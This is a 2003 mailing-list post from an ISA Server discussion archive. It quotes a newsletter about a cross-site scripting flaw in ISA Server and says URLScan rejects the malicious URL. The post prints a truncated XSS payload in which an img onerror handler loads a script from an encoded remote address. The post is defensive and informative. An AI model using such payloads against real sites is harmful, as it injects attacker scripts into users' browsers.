Re: ISA Cross Scripting Vulnerability KB article

• From: "cdawkins" <cdawkins@xxxxxxxxxxxxx>
• To: isalist@xxxxxxxxxxxxx
• Date: Sat, 19 Jul 2003 06:07:07 -0600

Here is a quote from an IIS newsletter I receive

<5> Cross scripting attack with ISA server easily defeated with URLScan

I want to point out a newly announced cross scripting attack that affects
ISA server. See http://www.pivx.com/larholm/adv/TL006/ for details. Notice
that URL to implement the exploit is something like
"http://
<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2f

This is a serious vulnerability, but if URLScan is installed on the ISA
server, in most configurations, this URL would be rejected instead of
processed. Once again, URLScan proves itself as a strong defender of
future, unknown attacks.

Other related posts:

• » ISA Cross Scripting Vulnerability KB article
• » Re: ISA Cross Scripting Vulnerability KB article
• » Re: ISA Cross Scripting Vulnerability KB article
• » Re: ISA Cross Scripting Vulnerability KB article
• » Re: ISA Cross Scripting Vulnerability KB article
• » RE: ISA Cross Scripting Vulnerability KB article
• » RE: ISA Cross Scripting Vulnerability KB article
• » Re: ISA Cross Scripting Vulnerability KB article
• » Re: ISA Cross Scripting Vulnerability KB article
• » Re: ISA Cross Scripting Vulnerability KB article
• » Re: ISA Cross Scripting Vulnerability KB article
• » Re: ISA Cross Scripting Vulnerability KB article
• » Re: ISA Cross Scripting Vulnerability KB article
• » Re: ISA Cross Scripting Vulnerability KB article
• » Re: ISA Cross Scripting Vulnerability KB article

1. Home
2. isalist
3. Archive
4. 07-2003

---

• » Previous by Date
• » Next by Date
• » Related Posts
• » View list details
• » Manage your subscription

---